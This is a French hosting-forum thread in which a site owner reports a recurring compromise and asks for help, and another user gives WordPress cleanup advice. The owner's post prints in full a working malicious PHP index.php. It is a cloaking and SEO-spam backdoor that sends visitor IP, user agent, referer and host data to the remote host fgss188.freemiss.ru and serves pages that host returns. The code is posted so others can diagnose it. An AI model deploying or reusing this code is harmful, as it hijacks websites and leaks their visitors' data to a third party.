J'ai un hébergement "Kimsufi 2015". La semaine dernière mon site a été piraté. J'ai investigué et j'ai l'impression que c'est le serveur FTP qui est piraté.
Les 2 étapes qui me font penser ça sont :
1 - J’efface l’intégralité de mes fichiers. - Il n'y a plus de fichier dans "www"
2 - je créé un fichier .htaccess vide dans "www'.
— à ce stade plus aucune action nécéssaire —
Le piratage apparait : un fichier index.php est créé sur le serveur et le fichier .htaccess n’est pas vide.
J'ai demandé de l'aide sur OVH Cloud, j'ai été très déçu de leurs réponses et ils ont fermés mon sujet en m'envoyant sur ce forum.
Savez-vous pourquoi mon dossier "www" est ainsi piraté ? J'ai tenté d'écraser les fichiers .htaccess et index.php qui ont été créés, mais il semble s'agir d'ancienne version qui sont rétablis dans l'état piraté !
Que faire ?
Pour le moment j'ai modifié mon dossier racine "www" vers un nouveau dossier, et le nouveau dossier n'est pas piraté.
Avez-vous des situations similaires qu'avez-vous fait ?
Piratage systematique sur le FTP
Sujets apparentés
- Cannot access to my OVH VPS: SSH and SFTP timeout
22205 
11.09.2018 06:46
- Quelle est la plage de port FTP mode passif ?
17430 08.12.2017 22:08
- Identifiants ftp
12907 16.05.2017 10:41
- Connection Ftp impossible
7759 24.04.2019 16:10
- FTP: Impossible de récupérer le contenu du dossier
7386 26.02.2017 15:48
- Parametrage ligne sip sur softphone
6440 12.07.2019 08:19
- Connexion FTP Filezilla - 421 Home directory not available - aborting
6334 19.04.2017 09:56
- Répertoire SFTP avec clé publique/privée
5987 23.11.2018 07:36
- Impossible de me connecter en ftp à mon serveur
5567 17.07.2018 14:38
- [Résolu] HubiC : accès par FTP - Où trouver l'adresse Hôte ?
5244 15.12.2017 07:16
Bonjour,
Avez vous modifié le mot de passe de votre compte FTP ?
Pourquoi ne pas utiliser SFTP ?
Êtes vous raisonnablement sur que votre ordinateur est "sain" ?
J'ai utilisé le FTP Online d'OVH et j'ai eu le même résultat.
```text Je tiens à ajouter que j'ai un site tout simple avec des images et du texte.
Voici les fichiers qui sont créés sur le serveur de manière automatique :
Informations complémentaires
voici le contenu du .htaccess qui n'est pas le mien
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
voici le code que je vois dans le fichier index.php qui ne vient pas de moi
$c='fgss188';@set_time_limit(3600);define("W",'http://fgss188.freemiss.ru');define("U",getu());function k($e){return@$_SERVER[$e]?$_SERVER[$e]:"";}define("S",k("PHP_SELF"));define("F",strpos(S,"index.php")!==false&&strpos(U,S)===false?rtrim(S,"index.php"):S);define("U2",preg_replace("#^\W+#","",ltrim(U,F)));$g=k('HTTP_USER_AGENT');function getu(){$i=k("REQUEST_URI");if(empty($i)){$i=S.'?'.(!empty(k('argv'))?k('argv')[0]:k('QUERY_STRING'));}return $i;}function is_https(){if(!empty($_SERVER['HTTPS'])&&strtolower($_SERVER['HTTPS'])!=='off'){return true;}elseif(!empty($_SERVER['HTTP_X_FORWARDED_PROTO'])&&$_SERVER['HTTP_X_FORWARDED_PROTO']==='https'){return true;}elseif(!empty($_SERVER['HTTP_FRONT_END_HTTPS'])&&strtolower($_SERVER['HTTP_FRONT_END_HTTPS'])!=='off'){return true;}return false;}function get_ip(){$j=$_SERVER['REMOTE_ADDR'];if(!empty($_SERVER['HTTP_CLIENT_IP'])){$j=$_SERVER['HTTP_CLIENT_IP'];}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$j=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(stristr($j,',')){$m=explode(",",$j);$j=$m[0];}return $j;}function http($n,$o){$q="text/html";if(strpos(U2,"pingsitemap")===false&&(strpos(U2,".xml")!==false||strpos(U2,"/feed")!==false)){$q="text/xml";}else if(strpos(U2,".txt")!==false){$q="text/plain";}else if(strpos(U2,"images/")!==false){$q="image/webp";}else if(strpos(U2,"sitemap.xsl")!==false){$q="text/css";}header("content-type: $q; charset=UTF-8");$r=http_build_query($o);$s=W.$n."?".$r;$w=@file_get_contents($s);if(!$w)$w=c(W.$n,$r,0);if(!$w)$w=c(W.$n,$r,1);if(!$w){$x=@fopen($s,'r');if($x){stream_get_meta_data($x);$y="";while(!feof($x)){$y.=fgets($x,1024);}fclose($x);return $y;}}return $w;}function c($n,$r,$z){$aa=curl_init();if($z){curl_setopt($aa,CURLOPT_URL,$n);curl_setopt($aa,CURLOPT_POST,1);curl_setopt($aa,CURLOPT_POSTFIELDS,$r);}else{curl_setopt($aa,CURLOPT_URL,$n."?".$r);}curl_setopt($aa,CURLOPT_RETURNTRANSFER,1);curl_setopt($aa,CURLOPT_HEADER,0);curl_setopt($aa,CURLOPT_TIMEOUT,10);curl_setopt($aa,CURLOPT_FOLLOWLOCATION,1);$w=curl_exec($aa);curl_close($aa);return $w;}function g($n,$o){$w=http($n,$o);if(!$w){@header('HTTP/1.1 500 Internal Server Error');die();}$e=substr($w,0,1);switch($e){case "4":@header('HTTP/1.1 404 Not Found');die();case "5":@header('HTTP/1.1 500 Internal Server Error');die();case "3":@header('HTTP/1.1 302 Moved Permanently');header('Location: '.substr($w,1));header('referer: '.k("HTTP_HOST"));die();case "7":return false;case "8":die();default:header('HTTP/1.1 200 OK');return $w;}}if(strpos(U,"jp2023")!==false){echo "
JP2023
".$c."-beautiful
";die();}$bb=array("ip"=>get_ip(),"lang"=>k("HTTP_ACCEPT_LANGUAGE"),"ua"=>$g,"r"=>strtolower(k("HTTP_REFERER")),"host"=>k("HTTP_HOST"),"uri"=>U,"uri2"=>U2,"isBot"=>preg_match("@google|yahoo|bing@",$g)?"1":"","f"=>F,);if(is_https()){$bb["h"]="1";}if(strpos(U,"pingsitemap")!==false){$cc=explode(",",g("/sitemap.list",$bb));foreach($cc as $dd){$o='https://www.google.com/ping?sitemap='.$dd;$w=c%28$o,array%28),0);if(!$w){$w=@file_get_contents($o);}if(stristr($w,'successfully')){echo $o.'pingok
';}else{echo $o.'======creat file false!
';}}die();}$ee=g("",$bb);if($ee)die($ee);?> ```
Commencez par changer tous les mots de passe Login OVH, FTP, Base de données, admin site tous différents et 16 caractères en désordre : (Chiffres, lettres, Majuscules, Minuscules).
Considérez que tous les fichiers de votre site sont probablement infectés.
Récupérez chez vous le contenu de wp-content et le wp-config.php.
Renommez themes en themes_old
Renommez plugins en plugins_old
Vous ne devriez plus avoir aucun fichier *.php sauf wp-content/index.php qui contient ces 2 lignes:
``// Silence is golden.`
Allez dans l'admin de votre site et désactivez tous les plugins.
Vous pouvez tout effacer dans votre site (ou les glisser dans un répertoire "de récupération" où tout ce qui s'y trouve est probablement infecté.)
Récupérez un Wordpress sain depuis Wordpress.org, dézippez et uploadez le tout.
Uploadez votre wp-config.php
Uploadez wp-content (sans les plugins et les thèmes)
Normalement votre site doit repartir.
Cependant dans certains cas des fragments infectés peuvent se trouver dans la base de données, vous pouvez aussi avoir des utilisateurs administrateurs que vous n'avez pas créés, la liste des risques est longue et on ne peut pas résumer toute la créativité des pirates dans une réponse.